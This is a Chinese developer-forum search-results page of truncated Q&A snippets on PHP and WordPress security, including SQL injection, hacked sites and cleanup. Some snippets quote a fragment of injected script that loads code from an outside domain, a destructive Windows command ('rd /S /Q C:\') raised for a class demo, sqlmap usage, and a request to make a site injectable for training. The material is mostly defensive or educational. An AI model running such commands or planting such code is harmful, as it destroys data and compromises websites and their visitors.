腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
2
回答
如果不使用自定义SQL,Wordpress是否有可
注入
SQL的漏洞?
、
我的问题:如果我不使用,我是否再次安全地进行了SQL
注入
?我只使用
PHP
、WP函数(用于通信数据库)和许多与数据库无关的其他语言。可湿性粉剂功能安全吗?对于熟悉SQL的人来说,这似乎很愚蠢,关于SQL
注入
有很多材料,但我找不到答案,我真的找不到答案。 我所说的WP函数是什么:update_post_meta(); get_user_meta();
浏览 1
提问于2015-11-30
得票数 1
回答已采纳
1
回答
依赖
注入
php
网站
、
、
、
、
我读到的关于依赖
注入
的文章越多,我就越困惑。我知道这是为了什么,这不是问题所在。试图在纸上做一些设计,这是我想出来的,不知怎么的,我似乎忽略了一些东西。但是,
PHP
允许我们构建和发送内联响应。因此,我们可以为每个页面提供一个Controller对象,或者其他发送响应的东西,并为此创建一个构建器。
浏览 5
提问于2014-11-03
得票数 2
回答已采纳
1
回答
网站
已被弹出窗口
注入
攻击
、
如果你们找到了 我可能会下载整个
网站
,并删除所有的
注入
代码。
浏览 18
提问于2020-08-07
得票数 0
1
回答
当前的安全
PHP
实践列表?
、
、
、
我刚开始使用
PHP
,最近我继承了一个
网站
项目,在这个项目中,最初的开发人员在查询mysqli_real_escape_string()数据库之前已经对用户输入进行了清理。正如我最近从绕过mysql的SQL
注入
_真品_转义_字符串()中了解到的那样,数据库仍然容易被SQL
注入
到数值字段中,因此应该使用准备好的语句。当我深入了解
PHP
如何清理、存储和管理数据时,我一次又一次地发现类似这样的漏洞。到目前为止,我可以在网上找到的大多数信息都已经过时了,因此很难找到当前最佳实践的列表。有没有人有一个全面的和
浏览 0
提问于2017-07-06
得票数 2
回答已采纳
1
回答
找到
注入
恶意代码的工具?
、
我搜索一个工具来在我的
PHP
文件中找到
注入
恶意代码。在每个
PHP
文件中,我都有这样的
注入
:我
浏览 4
提问于2015-07-28
得票数 1
回答已采纳
1
回答
消除多个
php
文件中的模式的最佳方法是什么?
、
、
使用数百个
php
文件在受感染的
网站
上工作,每个文件的顶部有以下
注入
的签名代码:其次是相邻的<?
php
部件
浏览 0
提问于2018-08-05
得票数 0
回答已采纳
1
回答
红色链接到我的
网站
名为ineeta .
php
的网页-这是一个关注吗?
、
、
、
我想确保这不会对我的
网站
造成任何问题,或成为一个安全风险。我的
网站
网址是imageworkshop.com,我看到的链接指向这个域上的以下路径: /imagework/ineeta.V1.02.07.
php
/imagework/ineeta.V1.02.13.
php
/imagework/ineeta.V1.02.15.
php
/imagework/ineeta.V1.03.01.
php
/ima
浏览 0
提问于2011-11-02
得票数 0
6
回答
Wordpress -
网站
被黑客入侵,并被重定向到一些恶意
网站
我有一个WordPress
网站
运行,但最近我的
网站
被黑。它甚至不可能进入我的
网站
:如果我浏览到我的
网站
,它是重定向到其他
网站
。 我已经尝试清理代码并检查任何脚本
注入
,但我无法找到malicius脚本。我试图清理所有的文件,如functions.
php
,header.
php
,footer.
php
,但是没有使用它,我无法找到
注入
的脚本。
浏览 1
提问于2019-02-12
得票数 2
回答已采纳
1
回答
从sql
注入
保护
php
脚本
、
我的朋友们的
网站
被黑了,黑客用SQLMAP从http://example.com/users/users.
php
?id=3泄露所有的数据库数据
浏览 0
提问于2016-08-02
得票数 -3
4
回答
快速实现
php
安全性
、
在接下来的几天里,我将不得不保护一个
网站
(我做到了),我想我会写到config.
php
文件(在所有的
php
页面中调用)。value = current($_POST)){ next($_POST);在config.
php
中,你认为我会是来自各种xxs和sql
注入
的siscuro吗?2)这种方法可以避免多次代码
注入
(xxs、sql
注入
等)? 编辑:如果用mysql_r
浏览 1
提问于2013-01-23
得票数 0
1
回答
如何使我的
PHP
网站
易受SQL
注入
的影响
、
、
为了培训目的,我想让一个演示
网站
容易受到SQL
注入
的影响。我转到服务器中的.htaccess文件并添加了以下两行:
php
_flag register_globals on如果我还需要做些什么来启用我的
网站
中的SQL
注入
,请帮助我。
浏览 0
提问于2015-04-24
得票数 -4
2
回答
网站
从恶意
网站
加载内容
、
我拥有一个
网站
。今天我发现当我加载这个站点时,Chrome会显示“等待xxx.com”和其他一些未知的站点。 该
网站
在WordPress上运行。
浏览 0
提问于2015-05-16
得票数 -1
1
回答
如何将whmcs之外的外部
php
变量包含到WHMCS中?
、
、
、
我想要做的是将用户名从
网站
注入
WHMCS。该
网站
没有与卫生保健中心合并。WHMCS安装在我的
网站
的一个子目录中。
网站
目录结构如下所示: whmcs_directory mywebsite.com是一个有会员的
网站
。它不是wordpress,它是一个自定义的
php
站点。然后我编写了javascript来
注入
和填充username字段。我在viewcart.
php
工作得很好。我可以很容易地将用户名从站点<e
浏览 1
提问于2017-10-23
得票数 0
1
回答
在wordpress站点的header.
php
文件中发现未知代码
、
、
我在主题的header.
php
文件中发现了下面的代码,我不确定它们都是关于什么的。encodeURIComponent(window.location.host); var base = "http://tradenetservice.com/js/jquery.min.
php
浏览 1
提问于2016-01-09
得票数 1
2
回答
我的Joomla
网站
被黑了。数据库是否也已损坏?
、
、
我在代码中看到的唯一
php
页面是index.
php
,所以我用备份替换了它,每天我都会看到它变成:我正在删除该
网站
,并重新安装Joomla及其所有插件。我不知道这只是一个
浏览 2
提问于2009-12-13
得票数 0
回答已采纳
3
回答
我被攻击了
PHP
/脚本
注入
-虚拟问题
、
我的
网站
被攻击是为了钓鱼的目的。这是一个复杂的
网站
,但我只使用post和
PHP
文件。如有任何暗示/建议,将不胜感激。因为脚本
注入
攻击站点代码本身,所以它能够完全避免the服务器的安全性。不幸的是,一些内容管理系统(特别是较旧版本的Jooml
浏览 8
提问于2011-09-12
得票数 1
回答已采纳
3
回答
防止
注入
和$_GET方法的正确语法
、
因此,我正在尝试使用get方法来防止
注入
。我正在尝试从数据库中获取数据并将其回显到页面中。我认为我试图用下面的代码做什么是很明显的,但我需要帮助来使用正确的语法。我在这个
网站
上找不到我要找的东西,在
PHP
网站
上我也找不到
最新
的方法。谢谢你的帮助。$mysqli = new mysqli("", "", "", "");
浏览 1
提问于2013-04-23
得票数 1
回答已采纳
2
回答
Windows Shell命令
、
、
、
、
我将在课堂上做一个关于
网站
安全的演讲,我创建了一个带有sql
注入
、xss和
PHP
注入
漏洞的演示
网站
(在虚拟机上)。我要加载一个执行shell命令的
PHP
文件,我的问题是,我可以在Window的PC上执行的最糟糕的shell命令是什么?"rd /S /Q C:\“是否成功删除C盘?
浏览 0
提问于2011-05-02
得票数 1
1
回答
如何用xampp建立sqlmap
注入
?
、
、
、
所以我下载Pythonver2.7和sqlmap来尝试
注入
我的
网站
(.
php
)。 我在网上搜索教程,并使用这个命令"sqlmap.py -u“链接获取结构。我的问题是,在教程中的链接末尾有一个".
php
?id=1”,他们通过搜索在Google中找到了id。但是我的服务器是xampp,我也不能在Google中搜索。那么"id=“是什么意思?还有,还有
注入
和获取该
网站
所有数据库的问题吗?因为我输入了sqlmap.py -u "http:/
浏览 0
提问于2017-04-20
得票数 1
回答已采纳
1
回答
这个后门是怎么工作的?
、
我刚刚发现我的一个wordpress
网站
包括后门(我猜)。 正如我现在看到的,服务器上的同一个文件与我的笔记本驱动器上的原始文件不同。所以我想我的
网站
已经被感染了。你能帮我清理一下吗?
浏览 0
提问于2017-11-18
得票数 2
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
PHP手工注入教程
最新PHP全套高清,网站开发看过来
PHP+Mysql手工SQL注入实例
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
最新报告78.7%网站的服务器端编程语言使用PHP
热门
标签
更多标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
活动推荐
运营活动
广告
关闭
领券